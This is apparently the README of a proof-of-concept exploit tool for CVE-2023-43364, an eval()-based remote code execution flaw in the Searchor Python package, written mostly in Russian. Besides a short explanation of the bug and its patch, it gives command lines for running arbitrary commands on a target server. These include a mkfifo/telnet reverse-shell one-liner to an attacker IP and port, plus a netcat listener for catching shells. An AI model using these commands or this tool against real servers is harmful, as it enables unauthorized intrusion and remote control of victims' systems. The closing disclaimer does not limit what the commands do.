
POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2)
Удаленное выполнение кода (RCE) через небезопасное использование
eval()в Searchor (< 2.4.2)
Этот проект демонстрирует эксплуатацию CVE-2023-43364 — уязвимости удаленного выполнения кода (RCE), затрагивающей Python-пакет Searchor (< 2.4.2).
Проблема вызвана небезопасным использованием eval() для пользовательского ввода, что позволяет злоумышленникам внедрять и выполнять произвольный Python-код.
Уязвимость была устранена путем удаления небезопасного использования eval(), как показано в официальном патче:
Дополнительные технические детали и уведомление:
Эта proof-of-concept предоставляет несколько методов выполнения, включая выполнение команд, проверку и обратные оболочки.
Выполните простую команду (id) для проверки выполнения кода:
python3 CVE-2023-43364.py <URL> --test
Выполнение произвольной команды
Выполните любую команду на целевом сервере:
python3 CVE-2023-43364.py <URL> -a "whoami"
Примеры:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Обратная оболочка
Запустите слушатель на вашей машине:
nc -lvnp 4444
Запустите эксплойт:
python3 CVE-2023-43364.py <URL> <LHOST>
Этот проект предназначен для:
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Используйте этот эксплойт только в контролируемых средах или на системах, на которые у вас есть явное разрешение на тестирование